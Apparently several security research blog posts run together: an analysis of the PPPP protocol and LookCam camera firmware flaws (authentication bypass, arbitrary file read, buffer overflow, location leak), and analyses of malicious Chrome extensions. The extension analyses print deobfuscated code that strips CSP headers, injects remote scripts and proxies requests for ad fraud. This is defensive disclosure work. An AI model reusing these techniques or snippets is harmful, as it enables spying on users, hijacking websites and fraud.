The BHCC device prefix is handled by a different set of servers that the app calls the “hekai” network. The corresponding devices appear to be marketed in China only.
With potentially very sensitive data being transmitted one would hope that the data is safely encrypted in transit. The TCP protocol outsources this task to additional layers like TLS. The PPPP protocol on the other hand has built-in “encryption,” in fact even two different encryption mechanisms.
First there is the blanket encryption of all transmitted messages. The corresponding function is aptly named P2P_Proprietary_Encrypt and it is in fact a very proprietary encryption algorithm. To my untrained eye there are a few issues with it:
MSG_HELLO message (it is known that the first four bytes message sent to port 32100 has the plaintext F1 00 00 00).In addition to that, some messages get special treatment. For example, the MSG_REPORT_SESSION_READY message is generally encrypted via P2P_Proprietary_Encrypt function with a key that is hardcoded in the CS2 library and has the same value in every app I checked.
Some messages employ a different encryption method. In case of the networks supported by LookCam it is only the MSG_DEV_LGN_CRC message (device registering with the server) that is used instead of the plaintext MSG_DEV_LGN message. As this message is sent by the device, the corresponding encryption key is only present in the device firmware, not in the application. I didn’t bother checking whether the server would still accept the unencrypted MSG_DEV_LGN message.
The encryption function responsible here is PPPP_CRCEnc. No, this isn’t a cyclic redundancy check (CRC). It’s rather an encryption function that will extend the plaintext by a four bytes padding. The decryptor will validate the padding, presumably that’s the reason for the name.
Of course, this still doesn’t make it an authenticated encryption scheme, yet the padding oracle attack is really the least of its worries. While there is a complicated selection approach, it effectively results in a sequence of bytes that the plaintext is XOR’ed with. Same sequence for every single message being encrypted in this way. Wikipedia has the following to say on the security of XOR ciphers:
By itself, using a constant repeating key, a simple XOR cipher can trivially be broken using frequency analysis. If the content of any message can be guessed or otherwise known then the key can be revealed.
Well, yes. That’s what we have here.
It’s doubtful that any of these encryption algorithms can deter even a barely determined attacker. But a blanket encryption with P2P_Proprietary_Encrypt (which LookCam doesn’t enable) would have three effects:
MSG_HELLO message.It is obvious that the designers of the PPPP protocol don’t understand cryptography, yet for some reason they don’t want to use established solutions either. It cannot even be about performance because AES is supported in hardware on these devices. But why for example this strange choice of encrypting a particular message while keeping the encryption of highly private data optional? Turns out, this is due to the threat model used by the PPPP protocol designers.
As a CS2 Network presentation deck shows, their threat model isn’t concerned about data leaks. The concern is rather denial-of-service attacks caused by registering fake devices. And that’s why this one message enjoys additional encryption. Not that I really understand the concern here, since the supposed hacker would still have to generate valid device IDs somehow. And if they can do that – well, them bringing the server down should really be the least concern.
But wait, there is another security layer here!
This is about the “init string” already mentioned in the context of encryption keys above. It also contains the IP addresses of the servers, mildly obfuscated. While these were “given to platform owner only,” these are necessarily contained in the LookCam app:
Some other apps contain dozens of such init strings, allowing them to deal with many different networks. So the threat model of the PPPP protocol cannot imagine someone extracting the “encrypted P2P server IP string” from the app. It cannot imagine someone reverse engineering the (trivial) obfuscation used here. And it definitely cannot imagine someone reverse engineering the protocol, so that they can communicate with the servers via “raw IP string” instead of their obfuscated one. Note: The latter has happened on several documented occasions already, e.g. here.
These underlying assumptions become even more obvious on this slide:
Yes, the only imaginable way to read out network data is via the API of their library. With a threat model like this, it isn’t surprising that the protocol makes all the wrong choices security-wise.
Once a connection is etablished the LookCam app and the camera will exchange JSON-encoded messages like the following:
{
"cmd": "LoginDev",
"pwd": "123456"
}
A paper from the Warwick University already took a closer look at the firmware and discovered something surprising. The LookCam app will send a LoginDev command like above to check whether the correct access password is being used for the device. But sending this command is entirely optional, and the firmware will happily accept other commands without a “login”!
The LookCam app will also send the access password along with every other command yet this password isn’t checked by the firmware either. I tried adding a trivial modification to the LookCam app which made it ignore the result of the LoginDev command. And this in fact bypassed the authentication completely, allowing me to access my camera despite a wrong password.
I could also confirm their finding that the DownloadFile command will read arbitrary files, allowing me to extract the firmware of my camera with the approach described in the paper. They even describe a trivial Remote Code Execution vulnerability which I also found in my firmware: that firmware often relies on running shell commands for tasks that could be easily done in its C language code.
This clearly isn’t the only Remote Code Execution vulnerability however. Here is some fairly typical code for this firmware:
char[256] buf;
char *cmd = cJSON_GetObjectItem(request, "cmd")->valuestring;
memset(buf, 0, sizeof(buf));
memcpy(buf, cmd, strlen(cmd));
This code copies a string (pointlessly but this isn’t the issue here). It completely fails to consider the size of the target buffer, going by the size of the incoming data instead. So any command larger than 255 bytes will cause a buffer overflow. And there is no stack canary here, Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) are disabled, so nothing prevents this buffer overflow from being turned into Remote Code Execution.
Finally, I’ve discovered that the searchWiFiList command will produce the list of WiFi networks visible to the camera. These by itself often already allow a good guess as to where the camera is located. In combination with a geolocation service these will typically narrow down the camera’s position to a radius of only a few dozen meters.
The only complication here: most geolocation services require not the network names but the MAC addresses of the access points. The MAC addresses aren’t part of the response data however. But: searchWiFiList works by running iwlist shell command and storing the complete output in /tmp/wifi_scan.txt file. It reads this file but does not remove it. This means that the file can subsequently be downloaded via DownloadFile command (allows reading arbitrary files as mentioned above) and that one contains full data including MAC addresses of all access points. So somebody who happened to learn the device ID can not only access the video stream but also find out where exactly this footage is being recorded.
The camera I’ve been looking at is running firmware version 2023-11-22. Is there a newer version, maybe one that fixes the password checks or the already published Remote Code Execution vulnerability? I have no idea. If the firmware for these cameras is available somewhere online then I cannot find it. I’ve also been looking for some kind of update functionality in these devices. But there is only a generic script from the Anyka SDK which isn’t usable for anyone other than maybe the hardware vendor.
When looking at the firmware I noticed some code uploading 5 MiB data chunks to api.l040z.com (or apicn.l040z.com if you happen to own a BHCC device). Now uploading exactly 5 MiB is weird (this size is hardcoded) but inspecting the LookCam app confirmed it: this is cloud functionality, and the firmware regularly uploads videos in this way. At least it does that when cloud functionality is enabled.
First thing worth noting: while the cloud server uses regular HTTP rather than some exotic protocol, all connections to it are generally unencrypted. The firmware simply lacks a TLS library it could use, and so the server doesn’t bother with supporting TLS. Meaning for example: if you happen to use their cloud functionality your ISP better be very trustworthy because it can see all the data your camera sends to the LookCam cloud. In fact, your ISP could even run its own “cloud server” and the camera will happily send your recorded videos to it.
Anyone dare a guess what the app developers mean by “financial-grade encryption scheme” here? Is it worse or better than military-grade encryption?
Second interesting finding: the cloud server has no authentication whatsoever. The camera only needs to know its device ID when uploading to the cloud. And the LookCam app – well, any cloud-related requests here also require device ID only. If somebody happens to learn your device ID they will gain full access to your cloud storage.
Now you might think that you can simply skip paying for the cloud service which, depending on the package you book, can come for as much as $40 per month. But this doesn’t mean that you are on the safe side because you aren’t the one controlling the cloud functionality on your device, the cloud server is. Every time the device boots up it sends a request to http://api.l040z.com/camera/signurl and the response tells it whether cloud functionality needs to be enabled.
So if LookCam developers decide that they want to see what your camera is doing (or if Chinese authorities become interested in that), they can always adjust that server response and the camera will start uploading video snapshots. You won’t even notice anything because the LookCam app checks cloud configuration by requesting http://api.l040z.com/app/cloudConfig which can remain unchanged.
And they aren’t the only ones who can enable the cloud functionality of your device. Anybody who happens to know your device ID can buy a cloud package for it. This way they can get access to your video recordings without ever accessing your device directly. And you will only notice the cloud functionality being active if you happen to go to the corresponding tab in the LookCam app.
Now that you are aware of device IDs being highly sensitive data, you certainly won’t upload screenshots containing them to social media. Does that mean that your camera is safe because nobody other than you knows its ID?
The short answer is: you don’t know that. First of all, you simply don’t know who already has your device ID. Did the shop that sold you the camera write the ID down? Did they maybe record a sales pitch featuring your camera before they sold it to you? Did somebody notice your camera’s device ID show up in the list of WiFi networks when it was running in access point mode? Did anybody coming to your home run a script to discover PPPP devices on the network? Yes, all of that might seem unlikely, yet it should be reason enough to wonder whether your camera’s recordings are really as private as they should be.
Then there is the issue of unencrypted data transfers. Whenever you connect to your camera from outside your home network the LookCam app will send all data unencrypted – including the device ID. Do you do that when connected to public WiFi? At work? In a vacation home? You don’t know who else is listening.
And finally there is the matter of verification codes which are the only mechanism preventing somebody from enumerating all device IDs. How difficult would it be to guess a verification code? Verification codes seem to use 22 letters (all Latin uppercase letters but A, I, O, Q). With five letters this means around 5 million possible combinations. According to Paul Marrapese PPPP servers don’t implement rate limiting (page 33), making trying out all these combinations perfectly realistic – maybe not for all possible device IDs but definitely for some.
But that resource-intensive approach is only necessary as long as the algorithm used to generate verification codes is a secret. Yet we have to assume that at least CS2 Network’s 300 customers have access to that algorithm, given that their server software somehow validates device IDs. Are they all trustworthy? How much would it cost to become a “customer” simply in order to learn that algorithm?
And even if we are willing to assume that CS2 Network runs proper background checks to ensure that their algorithm remains a secret: how difficult would it be to guess that algorithm? I found a number of device IDs online, and my primitive analysis of their verification codes indicates that these aren’t distributed equally. There is a noticeable affinity for certain prime numbers, so the algorithm behind them is likely a similar hack job as the other CS2 Network algorithms, throwing in mathematical operations and table lookups semi-randomly to make things look complicated. How long would this approach hold if somebody with actual cryptanalysis knowledge decided to figure this out?
So if you happen to own one of these cameras, what does all this mean to you? Even if you never disclosed the camera’s device ID yourself, you cannot rely on it staying a secret. And this means that whatever your camera is recording is no longer private.
Are you using it as a security camera? Your security camera might now inform potential thieves of the stuff that you have standing around and the times when you leave home. It will also let them know where exactly you live.
Are you using it to keep an eye on your child? Just… don’t. Even if you think that you yourself have a right to violate your child’s privacy, you really don’t want anybody else to watch.
And even if you “have nothing to hide”: somebody could compromise the camera in order to hack other devices on your network or to simply make it part of a botnet. Such things happened before, many times actually.
So the best solution is to dispose of this camera ASAP. Don’t sell it please because this only moves the problem to the next person. The main question is: how do you know that the camera you get instead will do better? I can only think of one indicator: if you want to access the camera from outside your network it should involve explicit setup steps, likely changing router configuration. The camera shouldn’t just expose itself to the internet automatically.
But if you actually paid hundreds of dollars for that camera and dumping it isn’t an option: running it in a safe manner is complicated. As I mentioned already, simply blocking internet access for the camera won’t work. This can be worked around but it’s complex enough to be not worth doing. You should be better off by installing a custom firmware. I haven’t tried it but at least this one looks like somebody actually thought about security.
As far as I am aware, the first research on the PPPP protocol was published by Paul Marrapese in 2019. He found a number of vulnerabilities, including one brand of cameras shipping their algorithm to generate verification codes with their client application. Knowing this algorithm, device IDs could be enumerated easily. Paul used this flaw to display the locations of millions of affected devices. His DEF CON talk is linked from the website and well worth watching.
Edit (2025-09-15): I was wrong, there is at the very least this early analysis of the protocol by Zoltán Balázs (2016) (starting at page 29) and some research into a particular brand of PPPP-based cameras by Pierre Kim (2017).
A paper from the Warwick University (2023) researched LookCam app specifically. In additions to some vulnerabilities I mentioned here it contains a number of details on how these cameras operate.
This Elastic Labs article (2024) took a close look at some other PPPP-based cameras, finding a number of issues.
The CS2 Network sales presentation (2016) offers a fascinating look into the thinking of PPPP protocol designers and into how their system was meant to work.
Two weeks ago I published an article on 63 malicious Chrome extensions. In most cases I could only identify the extensions as malicious. With large parts of their logic being downloaded from some web servers, it wasn’t possible to analyze their functionality in detail.
However, for the Download Manager Integration Checklist extension I have all parts of the puzzle now. This article is a technical discussion of its functionality that somebody tried very hard to hide. I was also able to identify a number of related extensions that were missing from my previous article.
Update (2025-02-04): An update to Download Manager Integration Checklist extension has been released a day before I published this article, clearly prompted by me asking adindex about this. The update removes the malicious functionality and clears extension storage. Luckily, I’ve saved both the previous version and its storage contents.
Since my previous article I found a bunch more extensions with malicious functionality that is almost identical to Download Manager Integration Checklist. The extension Auto Resolution Quality for YouTube™ does not seem to be malicious (yet?) but shares many remarkable oddities with the other extensions.
| Name | Weekly active users | Extension ID | Featured |
|---|---|---|---|
| Freemybrowser | 10,000 | bibmocmlcdhadgblaekimealfcnafgfn | ✓ |
| AutoHD for Twitch™ | 195 | didbenpmfaidkhohcliedfmgbepkakam | |
| Free simple Adult Blocker with password | 1,000 | fgfoepffhjiinifbddlalpiamnfkdnim | |
| Convert PDF to JPEG/PNG | 20,000 | fkbmahbmakfabmbbjepgldgodbphahgc | |
| Download Manager Integration Checklist | 70,000 | ghkcpcihdonjljjddkmjccibagkjohpi | ✓ |
| Auto Resolution Quality for YouTube™ | 223 | hdangknebhddccoocjodjkbgbbedeaam | |
| Adblock.mx - Adblock for Chrome | 1,000 | hmaeodbfmgikoddffcfoedogkkiifhfe | ✓ |
| Auto Quality for YouTube™ | 100,000 | iaddfgegjgjelgkanamleadckkpnjpjc | |
| Anti phising safer browsing for chrome | 7,000 | jkokgpghakemlglpcdajghjjgliaamgc | ✓ |
| Darktheme for google translate | 40,000 | nmcamjpjiefpjagnjmkedchjkmedadhc | ✓ |
Additional IOCs:
The Download Manager Integration Checklist extension was an odd one on the list in my previous article. It has very minimal functionality: it’s merely supposed to display a set of instructions. This is a task that doesn’t require any permissions at all, yet the extension requests access to all websites and declarativeNetRequest permission. Apparently, nobody noticed this inconsistency so far.
Looking at the extension code, there is another oddity. The checklist displayed by the extension is downloaded from Firebase, Google’s online database. Yet there is also a download from https://help.internetdownloadmanager.top/checklist, with the response being handled by this function:
async function u(l) {
await chrome.storage.local.set({ checklist: l });
await chrome.declarativeNetRequest.updateDynamicRules({
addRules: l.list.add,
removeRuleIds: l.list.rm,
});
}
This is what I flagged as malicious functionality initially: part of the response is used to add declarativeNetRequest rules dynamically. At first I missed something however: the rest of the data being stored as checklist is also part of the malicious functionality, allowing execution of remote code:
function f() {
let doc = document.documentElement;
function updateHelpInfo(info, k) {
doc.setAttribute(k, info);
doc.dispatchEvent(new CustomEvent(k.substring(2)));
doc.removeAttribute(k);
}
document.addEventListener(
"description",
async ({ detail }) => {
const response = await chrome.runtime.sendMessage(
detail.msg,
);
document.dispatchEvent(
new CustomEvent(detail.responseEvent, {
detail: response,
}),
);
},
);
chrome.storage.local.get("checklist").then(
({ checklist }) => {
if (checklist && checklist.info && checklist.core) {
updateHelpInfo(checklist.info, checklist.core);
}
},
);
}
There is a tabs.onUpdated listener hidden within the legitimate webextension-polyfill module that will run this function for every web page via tabs.executeScript API.
This function looks fairly unsuspicious. Understanding its functionality is easier if you know that checklist.core is "onreset". So it takes the document element, fills its onreset attribute with some JavaScript code from checklist.info, triggers the reset event and removes the attribute again. That’s how this extension runs some server-provided code in the context of every website.
When the extension downloads its “checklist” immediately after installation the server response will be empty. Sort of: “nothing to see here, this is merely some dead code somebody forgot to remove.” The server sets a cookie however, allowing it to recognize the user on subsequent downloads. And only after two weeks or so it will respond with the real thing. For example, the list key of the response looks like this then:
"add": [
{
"action": {
"responseHeaders": [
{
"header": "Content-Security-Policy-Report-Only",
"operation": "remove"
},
{
"header": "Content-Security-Policy",
"operation": "remove"
}
],
"type": "modifyHeaders"
},
"condition": {
"resourceTypes": [
"main_frame"
],
"urlFilter": "*"
},
"id": 98765432,
"priority": 1
}
],
"rm": [
98765432
]
No surprise here, this is about removing Content Security Policy protection from all websites, making sure it doesn’t interfere when the extension injects its code into web pages.
As I already mentioned, the core key of the response is "onreset", an essential component towards executing the JavaScript code. And the JavaScript code in the info key is heavily obfuscated by JavaScript Obfuscator, with most strings and property names encrypted to make reverse engineering harder.
Of course this kind of obfuscation can still be reversed, and you can see the entire deobfuscated code here. Note that most function and variable names have been chosen randomly, the original names being meaningless. The code consists of three parts:
Marshalling of various extension APIs: tabs, storage, declarativeNetRequest. This uses DOM events to communicate with the function f() mentioned above, this function forwards the messages to the extension’s background worker and the worker then calls the respective APIs.
In principle, this allows reading out your entire browser state: how many tabs, what pages are loaded etc. Getting notified on changes is possible as well. The code doesn’t currently use this functionality, but the server can of course produce a different version of it any time, for all users or only for selected targets.
There is also another aspect here: in order to run remote code, this code has been moved into the website realm. This means however that any website can abuse these APIs as well. It’s only a matter of knowing which DOM events to send. Yes, this is a massive security issue.
Code downloading a 256 KiB binary blob from https://st.internetdownloadmanager.top/bff and storing it in encoded form as bff key in the extension storage. No, this isn’t your best friend forever but a Bloom filter. This filter is applied to SHA-256 hashes of domain names and determines on which domain names the main functionality should be activated.
With Bloom filters, it is impossible to determine which exact data went into it. It is possible however to try out guesses, to see which one it accepts. Here is the list of matching domains that I could find. This list looked random to me initially, and I even suspected that noise has been added to it in order to hide the real target domains. Later however I could identify it as the list of adindex advertisers, see below.
The main functionality: when active, it sends the full address of the current page to https://st.internetdownloadmanager.top/cwc2 and might get a “session” identifier back. It is likely that this this server stores the addresses it receives and sells the resulting browsing history. This part of the functionality stays hidden however.
The “session” handling is visible on the other hand. There is some rate limiting here, making sure that this functionality is triggered at most once per minute and no more than once every 12 hours for each domain. If activated, a message is sent back to the extension’s background worker telling it to connect to wss://pa.internetdownloadmanager.top/s/<session>. All further processing happens there.
Here we are back in the extension’s static code, no longer remotely downloaded code. The entry point for the “session” handling is function __create. Its purpose has been concealed, with some essential property and method names contained in the obfuscated code above or received from the web socket connection. I filled in these parts and simplified the code to make it easier to understand:
var __create = url => {
const socket = new this.WebSocket(url);
const buffer = {};
socket.onmessage = event => {
let message = event.data.arrayBuffer ? event.data : JSON.parse(event.data);
this.stepModifiedMatcher(socket, buffer, message)
};
};
stepModifiedMatcher =
async (socket, buffer, message) => {
if (message.arrayBuffer)
buffer[1] = message.arrayBuffer();
else {
let [url, options] = message;
if (buffer[1]) {
options.body = await buffer[1];
buffer[1] = null;
}
let response = await this.fetch(url, options);
let data = await Promise.all([
!message[3] ? response.arrayBuffer() : false,
JSON.stringify([...response.headers.entries()]),
response.status,
response.url,
response.redirected,
]);
for (const entry of data) {
if (socket.readyState === 1) {
socket.send(entry);
}
}
}
};
This receives instructions from the web socket connection on what requests to make. Upon success the extension sends information like response text, HTTP headers and HTTP status back to the server.
What is this good for? Before I could observe this code in action I was left guessing. Is this an elaborate approach to de-anonymize users? On some websites their name will be right there in the server response. Or is this about session hijacking? There would be session cookies in the headers and CSRF tokens in the response body, so the extension could be instrumented to perform whatever actions necessary on behalf of the attackers – like initiating a money transfer once the user logs into their PayPay account.
The reality turned out to be far more mundane. When I finally managed to trigger this functionality on the Ashley Madison website, I saw the extension perform lots of web requests. Apparently, it was replaying a browsing session that was recorded two days earlier with the Firefox browser. The entry point of this session: https://api.sslcertifications.org/v1/redirect?advertiserId=11EE385A29E861E389DA14DDA9D518B0&adspaceId=11EE4BCA2BF782C589DA14DDA9D518B0&customId=505 (redirecting to ashleymadison.com).
The server handling api.sslcertifications.org belongs to the German advertising company adindex. Their list of advertisers is mostly identical to the list of domains matched by the Bloom filter the extension uses. So this is ad fraud: the extension generates fake link clicks, making sure its owner earns money for “advertising” websites like Ashley Madison. It uses the user’s IP address and replays recorded sessions to make this look like legitimate traffic, hoping to avoid detection this way.
I contacted adindex and they confirmed that sslcertifications.org is a domain registered by a specific publisher but handled by adindex. They also said that they confronted the publisher in question with my findings and, having found their response unsatisfactory, blocked this publisher. Shortly afterwards the internetdownloadmanager.top domain became unreachable, and api.sslcertifications.org site no longer has a valid SSL certificate. Domains related to other extensions, the ones I didn’t mention in my request, are still accessible.
The adindex CEO declined to provide the identity of the problematic publisher. There are obvious data protection reasons for that. However, as I looked further I realized that he might have additional reasons to withhold this information.
While most extensions I list provide clearly fake names and addresses, the Auto Quality for YouTube™ extension is associated with the MegaXT website. That website doesn’t merely feature a portfolio of two browser extensions (the second one being an older Manifest V2 extension also geared towards running remote code) but also a real owner with a real name. Who just happens to be a developer at adindex.
There is also the company eokoko GmbH, developing Auto Resolution Quality for YouTube™ extension. This extension appears to be non-malicious at the moment, yet it shares a number of traits with the malicious extensions on my list. Director of this company is once again the same adindex developer.
And not just any developer. According to his website he used to be CTO at adindex in 2013 (I couldn’t find an independent confirmation for this). He also founded a company together with the adindex CEO in 2018, something that is confirmed by public records.
When I mentioned this connection in my communication with adindex CEO the response was:
[He] works for us as a freelancer in development. Employees (including freelancers) are generally not allowed to operate publisher accounts at adindex and the account in question does not belong to [this developer]. Whether he operates extensions is actually beyond my knowledge.
I want to conclude this article with some assorted history facts:
As noted last week I consider it highly problematic that Google for a long time allowed extensions to run code they downloaded from some web server, an approach that Mozilla prohibited long before Google even introduced extensions to their browser. For years this has been an easy way for malicious extensions to hide their functionality. When Google finally changed their mind, it wasn’t in form of a policy but rather a technical change introduced with Manifest V3.
As with most things about Manifest V3, these changes are meant for well-behaving extensions where they in fact improve security. As readers of this blog probably know, those who want to find loopholes will find them: I’ve already written about the Honey extension bundling its own JavaScript interpreter and malicious extensions essentially creating their own programming language. This article looks into more approaches I found used by malicious extensions in Chrome Web Store. And maybe Google will decide to prohibit remote code as a policy after all.
Update (2025-01-20): Added two extensions to the bonus section. Also indicated in the tables which extensions are currently featured in Chrome Web Store.
Update (2025-01-21): Got a sample of the malicious configurations for Phoenix Invicta extensions. Added a section describing it and removed “But what do these configurations actually do” section. Also added a bunch more domains to the IOCs section.
Update (2025-01-28): Corrected the “Netflix Party” section, Flipshope extension isn’t malicious after all. Also removed the attribution subsection here.
This article originally started as an investigation into Phoenix Invicta Inc. Consequently, this is the best researched part of it. While I could attribute only 14 extensions with rather meager user numbers to Phoenix Invicta, that’s likely because they’ve only started recently. I could find a large number of domain names, most of which aren’t currently being used by any extensions. A few are associated with extensions that have been removed from Chrome Web Store but most seem to be reserved for future use.
It can be assumed that these extensions are meant to inject ads into web pages, yet Phoenix Invicta clearly put some thought into plausible deniability. They can always claim their execution of remote code to be a bug in their otherwise perfectly legitimate extension functionality. So it will be interesting to see how Google will deal with these extensions, lacking (to my knowledge) any policies that apply here.
The malicious intent is a bit more obvious with Netflix Party and related extensions. This shouldn’t really come as a surprise to Google: the most popular extension of the group was a topic on this blog back in 2023, and a year before that McAfee already flagged two extensions of the group as malicious. Yet here we are, and these extensions are still capable of spying, affiliate fraud and cookie stuffing as described by McAfee. If anything, their potential to do damage has only increased.
Finally, the group of extensions around Sweet VPN is the most obviously malicious one. To be fair, what these extensions do is probably best described as obfuscation rather than remote code execution. Still, they download extensive instructions from their web servers even though these aren’t too flexible in what they can do without requiring changes to the extension code. Again there is spying on the users and likely affiliate fraud as well.
In the following sections I will be discussing each group separately, listing the extensions in question at the end of each section. There is also a complete list of websites involved in downloading instructions at the end of the article.
Let’s first take a look at an extension called “Volume Booster - Super Sound Booster.” It is one of several similar extensions and it is worth noting that the extension’s code is neither obfuscated nor minified. It isn’t hiding any of its functionality, relying on plausible deniability instead.
For example, in its manifest this extension requests access to all websites:
"host_permissions": [
"http://*/*",
"https://*/*"
],
Well, it obviously needs that access because it might have to boost volume on any website. Of course, it would be possible to write this extension in a way that the activeTab permission would suffice. But it isn’t built in this way.
Similarly, one could easily write a volume booster extension that doesn’t need to download a configuration file from some web server. In fact, this extension works just fine with its default configuration. But it will still download its configuration roughly every six hours just in case (code slightly simplified for readability):
let res = await fetch(`https://super-sound-booster.info/shortcuts?uuid=${userId}`,{
method: 'POST',
body: JSON.stringify({installParams}),
headers: { 'Content-Type': 'text/plain' }
});
let data = await res.json();
if (data.shortcuts) {
chrome.storage.local.set({
shortcuts: {
list: data.shortcuts,
updatedAt: Date.now(),
}
});
}
if (data.volumeHeaders) {
chrome.storage.local.set({
volumeHeaderRules: data.volumeHeaders
});
}
if (data.newsPage) {
this.openNewsPage(data.newsPage.pageId, data.newsPage.options);
}
This will send a unique user ID to a server which might then respond with a JSON file. Conveniently, the three possible values in this configuration file represent three malicious functions of the extensions.
The extension contains a default “shortcut” which it will inject into all web pages. It can typically be seen in the lower right corner of a web page:
And if you move your mouse pointer to that button a message shows up:
That’s it, it doesn’t do anything else. This “feature” makes no sense but it provides the extension with plausible deniability: it has a legitimate reason to inject HTML code into all web pages.
And of course that “shortcut” is remotely configurable. So the shortcuts value in the configuration response can define other HTML code to be injected, along with a regular expression determining which websites it should be applied to.
“Accidentally” this HTML code isn’t subject to the remote code restrictions that apply to browser extensions. After all, any JavaScript code contained here would execute in the context of the website, not in the context of the extension. While that code wouldn’t have access to the extension’s privileges, the end result is pretty much the same: it could e.g. spy on the user as they use the web page, transmit login credentials being entered, inject ads into the page and redirect searches to a different search engine.
There is only a slight issue here: a website might use a security mechanism called Content Security Policy (CSP). And that mechanism can for example restrict what kind of scripts are allowed to run on the web site, in the same way the browser restricts the allowed scripts for the extension.
The extension solves this issue by abusing the immensely powerful declarativeNetRequest API. Looking at the extension manifest, a static rule is defined for this API:
[
{
"id": 1,
"priority": 1,
"action": {
"type": "modifyHeaders",
"responseHeaders": [
{ "header": "gain-id", "operation": "remove" },
{ "header": "basic-gain", "operation": "remove" },
{ "header": "audio-simulation-64-bit", "operation": "remove" },
{ "header": "content-security-policy", "operation": "remove" },
{ "header": "audio-simulation-128-bit", "operation": "remove" },
{ "header": "x-frame-options", "operation": "remove" },
{ "header": "x-context-audio", "operation": "remove" }
]
},
"condition": { "urlFilter": "*", "resourceTypes": ["main_frame","sub_frame"] }
}
]
This removes a bunch of headers from all HTTP responses. Most headers listed here are red herrings – a gain-id HTTP header for example doesn’t really exist. But removing Content-Security-Policy header is meant to disable CSP protection on all websites. And removing X-Frame-Options header disables another security mechanism that might prevent injecting frames into a website. This probably means that the extension is meant to inject advertising frames into websites.
But these default declarativeNetRequest rules aren’t the end of the story. The volumeHeaders value in the configuration response allows adding more rules whenever the server decides that some are needed. As these rules aren’t code, the usual restrictions against remote code don’t apply here.
The name seems to suggest that these rules are all about messing with HTTP headers. And maybe this actually happens, e.g. adding cookie headers required for cookie stuffing. But judging from other extensions the main point is rather preventing any installed ad blockers from blocking ads displayed by the extension. Yet these rules provide even more damage potential. For example, declarativeNetRequest allows “redirecting” requests which on the first glance is a very convenient way to perform affiliate fraud. It also allows “redirecting” requests when a website loads a script from a trusted source, making it get a malicious script instead – another way to hijack websites.
Side-note: This abuse potential is the reason why legitimate ad blockers, while downloading their rules from a web server, never make these rules as powerful as the declarativeNetRequest API. It’s bad enough that a malicious rule could break the functionality of a website, but it shouldn’t be able to spy on the user for example.
Finally, there is the newsPage value in the configuration response. It is passed to the openNewsPage function which is essentially a wrapper around tabs.create() API. This will load a page in a new tab, something that extension developers typically use for benign things like asking for donations.
Except that Volume Booster and similar extensions don’t merely take a page address from the configuration but also some options. Volume Booster will take any options, other extensions will sometimes allow only specific options instead. One option that the developers of these extensions seem to particularly care about is active which allows opening tabs in background. This makes me suspect that the point of this feature is displaying pop-under advertisements.
There are many extensions similar to Volume Booster. The general approach seems to be:
declarativeNetRequest API. Alternatively (or additionally), use static rules in the extension that will remove pesky security headers from all websites, nobody will ask why you need that.Not all extensions implement all of these points. With some of the extensions the malicious functionality seems incomplete. I assume that it isn’t being added all at once, instead the support for malicious configurations is added slowly to avoid raising suspicions. And maybe for some extensions the current state is considered “good enough,” so nothing is to come here any more.
After I already published this article I finally got a sample of the malicious “shortcut” value, to be applied on all websites. Unsurprisingly, it had the form:
<img height="1" width="1" src="data:image/gif;base64,…"
onload="(() => {…})();this.remove()">
This injects an invisible image into the page, runs some JavaScript code via its load event handler and removes the image again. The JavaScript code consists of two code blocks. The first block goes like this:
if (isGoogle() || isFrame()) {
hideIt();
const script = yield loadScript();
if (script) {
window.eval.call(window, script);
window.gsrpdt = 1;
window.gsrpdta = '_new'
}
}
The isGoogle function looks for a Google subdomain and a query – this is about search pages. The isFrame function looks for frames but excludes “our frames” where the address contains all the strings q=, frmid and gsc.page. The loadScript function fetches a script from https://shurkul[.]online/v1712/g1001.js. This script then injects a hidden frame into the page, loaded either from kralforum.com.tr (Edge) or rumorpix.com (other browsers). There is also some tracking to an endpoint on dev.astralink.click but the main logic operating the frame is in the other code block.
The second code block looks like this (somewhat simplified for readability):
if (window.top == window.self) {
let response = await fetch('https://everyview.info/c', {
method: 'POST',
body: btoa(unescape(encodeURIComponent(JSON.stringify({
u: 'm5zthzwa3mimyyaq6e9',
e: 'ojkoofedgcdebdnajjeodlooojdphnlj',
d: document.location.hostname,
t: document.title,
'iso': 4
})))),
headers: {
'Content-Type': 'text/plain'
},
credentials: 'include'
});
let text = await response.text();
runScript(decodeURIComponent(escape(atob(text))));
} else {
window.addEventListener('message', function(event) {
event && event.data && event.data.boosterWorker &&
event.data.booster && runScript(event.data.booster);
});
}
So for top-level documents this downloads some script from everyview.info and runs it. That script in turn injects another script from lottingem.com. And that script loads some ads from gulkayak.com or topodat.info as well as Google ads, makes sure these are displayed in the frame and positions the frame above the search results. The result are ads which can be barely distinguished from actual search results, here is what I get searching for “amazon” for example:
The second code block also has some additional tracking going to doubleview.online, astato.online, doublestat.info, triplestat.online domains.
The payloads I got for the Manual Finder 2024 and Manuals Viewer extensions are similar but not identical. In particular, these use fivem.com.tr domain for the frame. But the result is essentially the same: ads that are almost impossible to distinguish from the search results. In this screenshot the link at the bottom is a search result, the one above it is an ad:
These extensions are associated with a company named Phoenix Invicta Inc, formerly Funteq Inc. While supposedly a US company of around 20 people, its terms of service claim to be governed by Hong Kong law, all while the company hires its employees in Ukraine. While it doesn’t seem to have any physical offices, the company offers its employees the use of two co-working spaces in Kyiv. To add even more confusion, Funteq Inc. was registered in the US with its “office address” being a two room apartment in Moscow.
Before founding this company in 2016 its CEO worked as CTO of something called Ormes.ru. Apparently, Ormes.ru was in the business of monetizing apps and browser extensions. Its sales pitches can still be found all over the web, offering extension developers to earn money with various kinds of ads. Clearly, there has been some competence transfer here.
Occasionally Phoenix Invicta websites will claim to be run by another company named Damiko Inc. Of course these claims don’t have to mean anything, as the same websites will also occasionally claim to be run by a company in the business of … checks notes … selling knifes.
Yet Damiko Inc. is officially offering a number of extensions in the Chrome Web Store. And while these certainly aren’t the same as the Phoenix Invicta extensions, all but one of these extensions share certain similarities with them. In particular, these extensions remove the Content-Security-Policy HTTP header despite having no means of injecting HTML content into web pages from what I can tell.
Damiko Inc. appears to be a subsidiary of the Russian TomskSoft LLC, operating in the US under the name Tomsk Inc. How does this fit together? Did TomskSoft contract Phoenix Invicta to develop browser extensions for them? Or is Phoenix Invicta another subsidiary of TomskSoft? Or some other construct maybe? I don’t know. I asked TomskSoft for comment on their relationship with this company but haven’t received a response so far.
The following extensions are associated with Phoenix Invicta:
| Name | Weekly active users | Extension ID | Featured |
|---|---|---|---|
| Click & Pick | 20 | acbcnnccgmpbkoeblinmoadogmmgodoo | |
| AdBlock for Youtube: Skip-n-Watch | 3,000 | coebfgijooginjcfgmmgiibomdcjnomi | |
